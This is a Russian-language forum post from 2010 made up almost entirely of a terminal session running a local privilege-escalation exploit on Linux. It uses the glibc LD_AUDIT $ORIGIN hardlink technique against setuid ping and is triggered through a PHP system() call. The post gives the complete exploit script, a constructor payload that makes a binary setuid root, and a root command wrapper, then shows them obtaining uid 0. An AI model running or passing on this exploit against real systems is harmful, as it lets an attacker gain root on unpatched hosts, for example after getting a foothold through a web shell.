Показать сообщение отдельно
Старый 20.10.2010, 17:41   #2
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

В качестве быстрой пробы:
Код:
[synq@localhost test]$ ls -la
total 28
drwxr-xr-x  2 synq synq 4096 Oct 20 09:38 .
drwx------ 17 synq synq 4096 Oct 20 09:20 ..
-rw-rw-r--  1 synq synq   36 Oct 20 09:35 1.php
-rwxrwxr-x  1 synq synq  222 Oct 20 09:32 auto.sh
-rw-r--r--  1 synq synq  139 Oct 20 09:25 exec2.c
-rw-r--r--  1 synq synq  122 Oct 20 09:27 payload.c
[synq@localhost test]$ gcc exec2.c -o exec2
[synq@localhost test]$ ls -la
total 36
drwxr-xr-x  2 synq synq 4096 Oct 20 09:38 .
drwx------ 17 synq synq 4096 Oct 20 09:20 ..
-rw-rw-r--  1 synq synq   36 Oct 20 09:35 1.php
-rwxrwxr-x  1 synq synq  222 Oct 20 09:32 auto.sh
-rwxrwxr-x  1 synq synq 7001 Oct 20 09:38 exec2
-rw-r--r--  1 synq synq  139 Oct 20 09:25 exec2.c
-rw-r--r--  1 synq synq  122 Oct 20 09:27 payload.c
[synq@localhost test]$ id
uid=500(synq) gid=500(synq) groups=500(synq)
[synq@localhost test]$ cat 1.php 
<? system("/bin/bash ./auto.sh");?>
[synq@localhost test]$ cat auto.sh 
#!/bin/sh
mkdir ./exploit
ln /bin/ping ./exploit/target
exec 3< ./exploit/target
ls -l /proc/$$/fd/3
rm -rf ./exploit/
ls -l /proc/$$/fd/3
gcc -w -fPIC -shared -o exploit payload.c
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
[synq@localhost test]$ cat exec2.c 
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
if(argc == 2) {
setgid(0); setuid(0);
system(argv[1]); }
return 0;
}
[synq@localhost test]$ cat payload.c 
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/chown root.root ./exec2; /bin/chmod 4755 ./exec2;");
}
[synq@localhost test]$ php 1.php 
lr-x------ 1 synq synq 64 Oct 20 09:38 /proc/4106/fd/3 -> /home/synq/test/exploit/target
lr-x------ 1 synq synq 64 Oct 20 09:38 /proc/4106/fd/3 -> /home/synq/test/exploit/target (deleted)
ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: undefined symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
            [-M mtu discovery hint] [-S sndbuf]
            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[synq@localhost test]$ ls -la
total 44
drwxr-xr-x  2 synq synq 4096 Oct 20 09:38 .
drwx------ 17 synq synq 4096 Oct 20 09:20 ..
-rw-rw-r--  1 synq synq   36 Oct 20 09:35 1.php
-rwxrwxr-x  1 synq synq  222 Oct 20 09:32 auto.sh
-rwsr-xr-x  1 root  root  7001 Oct 20 09:38 exec2
-rw-r--r--  1 synq synq  139 Oct 20 09:25 exec2.c
-rwxrwxr-x  1 synq synq 6052 Oct 20 09:38 exploit
-rw-r--r--  1 synq synq  122 Oct 20 09:27 payload.c
[synq@localhost test]$ id
uid=500(synq) gid=500(synq) groups=500(synq)
[synq@localhost test]$ ./exec2 id
uid=0(root) gid=0(root) groups=500(synq)
[synq@localhost test]$ uname -an
Linux localhost.localdomain 2.6.18-164.11.1.el5 #1 SMP Wed Jan 20 00:57:09 EST 2010 x86_64 x86_64 x86_64 GNU/Linux
SynQ вне форума   Ответить с цитированием